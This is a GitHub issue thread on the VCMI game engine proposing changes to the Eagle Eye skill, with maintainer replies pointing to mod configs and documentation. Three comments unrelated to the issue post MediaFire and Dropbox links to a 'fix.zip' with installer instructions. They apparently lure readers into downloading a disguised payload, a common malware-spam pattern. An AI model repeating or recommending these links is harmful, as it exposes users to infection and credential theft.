### ISSUE TITLE
Improvement of eagle eye

### ISSUE THREAD

**Issue by jaicmatija** [vcmi/vcmi#4511]
**Describe your proposal**
Eagle eye secondary skill should be a bit stronger. First the chance of learning a spell should be 40/50/70 % and also add that on expert you can learn 5th level spell.

Beside that, a big change should be that Eagle eye can learn spells from Units (enemy or friendly) not just enemy heroes. e.g when your Archangels cast resurrect you can lean it. The learning should be instant not after the battle in that way you could use the spell as a hero. Also chance of learning a spell should be rolled per spell cast.

**Additional context**
This would improve the skill and make it more strategically useful, which will make the game more deep.
This skill will be usefull especialy when there is a spell banned from the map. e.g Resurrection is banned from the map so only way to learn it is that you have eagle eye and archangel.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanSavenko** [comment]
Changing chances or spell levels for eagle eye is already possible via mods.

Unmodded vcmi implements H3:SoD mechanics. Everything else belong to mods.

**Comment by IvanSavenko** [comment]
Hota does this for a lot of skills:
https://github.com/vcmi-mods/horn-of-the-abyss/blob/vcmi-1.5/hota/Mods/gameBalance/content/config/hotaGameBalance/skills.json

Also check our docs & our config for h3 skills:
https://vcmi.eu/modders/Entities_Format/Secondary_Skill_Format/
https://github.com/vcmi/vcmi/blob/develop/config/skills.json

**Comment by jaicmatija** [comment]
> Hota does this for a lot of skills: https://github.com/vcmi-mods/horn-of-the-abyss/blob/vcmi-1.5/hota/Mods/gameBalance/content/config/hotaGameBalance/skills.json
> 
> Also check our docs & our config for h3 skills: https://vcmi.eu/modders/Entities_Format/Secondary_Skill_Format/ https://github.com/vcmi/vcmi/blob/develop/config/skills.json

Thank again.
How hard would it be to change not just percentage but to make that eagle eye learns spells from units not just enemy heroes, and tha it is instant?
